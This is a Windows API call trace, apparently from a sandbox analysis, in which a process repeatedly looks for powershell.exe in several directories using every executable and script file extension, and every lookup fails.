	[0194.625] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.625] GetLastError () returned 0x3
	[0194.625] SetErrorMode (uMode=0x1) returned 0x1
	[0194.625] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.VBE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.625] GetLastError () returned 0x3
	[0194.768] SetErrorMode (uMode=0x1) returned 0x1
	[0194.769] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.769] GetLastError () returned 0x3
	[0194.769] SetErrorMode (uMode=0x1) returned 0x1
	[0194.769] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.769] GetLastError () returned 0x3
	[0194.771] SetErrorMode (uMode=0x1) returned 0x1
	[0194.772] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.772] GetLastError () returned 0x3
	[0194.772] SetErrorMode (uMode=0x1) returned 0x1
	[0194.772] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.JSE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.772] GetLastError () returned 0x3
	[0194.775] SetErrorMode (uMode=0x1) returned 0x1
	[0194.775] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.775] GetLastError () returned 0x3
	[0194.775] SetErrorMode (uMode=0x1) returned 0x1
	[0194.776] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSF", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.776] GetLastError () returned 0x3
	[0194.779] SetErrorMode (uMode=0x1) returned 0x1
	[0194.779] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.779] GetLastError () returned 0x3
	[0194.779] SetErrorMode (uMode=0x1) returned 0x1
	[0194.779] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.WSH", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.779] GetLastError () returned 0x3
	[0194.782] SetErrorMode (uMode=0x1) returned 0x1
	[0194.800] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0194.800] GetLastError () returned 0x3
	[0194.800] SetErrorMode (uMode=0x1) returned 0x1
	[0194.801] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.exe.MSC", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.801] GetLastError () returned 0x3
	[0194.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.805] GetLastError () returned 0x3
	[0194.805] SetErrorMode (uMode=0x1) returned 0x1
	[0194.805] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.806] GetLastError () returned 0x2
	[0194.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.806] GetLastError () returned 0x2
	[0194.806] SetErrorMode (uMode=0x1) returned 0x1
	[0194.806] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.ps1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.806] GetLastError () returned 0x2
	[0194.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.806] GetLastError () returned 0x2
	[0194.806] SetErrorMode (uMode=0x1) returned 0x1
	[0194.807] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psm1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.807] GetLastError () returned 0x2
	[0194.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.807] GetLastError () returned 0x2
	[0194.807] SetErrorMode (uMode=0x1) returned 0x1
	[0194.807] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.psd1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.807] GetLastError () returned 0x2
	[0194.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.808] GetLastError () returned 0x2
	[0194.808] SetErrorMode (uMode=0x1) returned 0x1
	[0194.808] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.COM", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.808] GetLastError () returned 0x2
	[0194.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.808] GetLastError () returned 0x2
	[0194.808] SetErrorMode (uMode=0x1) returned 0x1
	[0194.808] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.EXE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.808] GetLastError () returned 0x2
	[0194.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.809] GetLastError () returned 0x2
	[0194.809] SetErrorMode (uMode=0x1) returned 0x1
	[0194.809] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.BAT", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.809] GetLastError () returned 0x2
	[0194.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.809] GetLastError () returned 0x2
	[0194.809] SetErrorMode (uMode=0x1) returned 0x1
	[0194.809] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.CMD", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.810] GetLastError () returned 0x2
	[0194.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.810] GetLastError () returned 0x2
	[0194.810] SetErrorMode (uMode=0x1) returned 0x1
	[0194.810] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.810] GetLastError () returned 0x2
	[0194.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.810] GetLastError () returned 0x2
	[0194.811] SetErrorMode (uMode=0x1) returned 0x1
	[0194.811] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.VBE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.811] GetLastError () returned 0x2
	[0194.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.811] GetLastError () returned 0x2
	[0194.811] SetErrorMode (uMode=0x1) returned 0x1
	[0194.811] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JS", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.812] GetLastError () returned 0x2
	[0194.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.812] GetLastError () returned 0x2
	[0194.812] SetErrorMode (uMode=0x1) returned 0x1
	[0194.812] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.JSE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.812] GetLastError () returned 0x2
	[0194.812] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.812] GetLastError () returned 0x2
	[0194.812] SetErrorMode (uMode=0x1) returned 0x1
	[0194.813] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSF", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.813] GetLastError () returned 0x2
	[0194.813] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.813] GetLastError () returned 0x2
	[0194.813] SetErrorMode (uMode=0x1) returned 0x1
	[0194.813] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.WSH", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.814] GetLastError () returned 0x2
	[0194.814] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0194.814] GetLastError () returned 0x2
	[0194.814] SetErrorMode (uMode=0x1) returned 0x1
	[0194.814] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.exe.MSC", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.814] GetLastError () returned 0x2
	[0194.814] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.814] GetLastError () returned 0x2
	[0194.814] SetErrorMode (uMode=0x1) returned 0x1
	[0194.815] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.815] GetLastError () returned 0x2
	[0194.815] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.815] GetLastError () returned 0x2
	[0194.815] SetErrorMode (uMode=0x1) returned 0x1
	[0194.815] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.ps1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.815] GetLastError () returned 0x2
	[0194.816] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.816] GetLastError () returned 0x2
	[0194.816] SetErrorMode (uMode=0x1) returned 0x1
	[0194.816] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psm1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.816] GetLastError () returned 0x2
	[0194.816] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.816] GetLastError () returned 0x2
	[0194.816] SetErrorMode (uMode=0x1) returned 0x1
	[0194.816] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.psd1", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.817] GetLastError () returned 0x2
	[0194.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.817] GetLastError () returned 0x2
	[0194.817] SetErrorMode (uMode=0x1) returned 0x1
	[0194.817] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.COM", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.817] GetLastError () returned 0x2
	[0194.817] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.817] GetLastError () returned 0x2
	[0194.817] SetErrorMode (uMode=0x1) returned 0x1
	[0194.817] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.EXE", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.818] GetLastError () returned 0x2
	[0194.818] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.818] GetLastError () returned 0x2
	[0194.818] SetErrorMode (uMode=0x1) returned 0x1
	[0194.818] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.BAT", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.818] GetLastError () returned 0x2
	[0194.818] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.818] GetLastError () returned 0x2
	[0194.818] SetErrorMode (uMode=0x1) returned 0x1
	[0194.819] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.exe.CMD", lpFindFileData=0x631588 | out: lpFindFileData=0x631588*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0194.819] GetLastError () returned 0x2
	[0194.819] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x5f6e794, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0194.819] GetLastError () returned 0x2
	[0194.819] SetErrorMode (uMode=0x1) returned 0x1
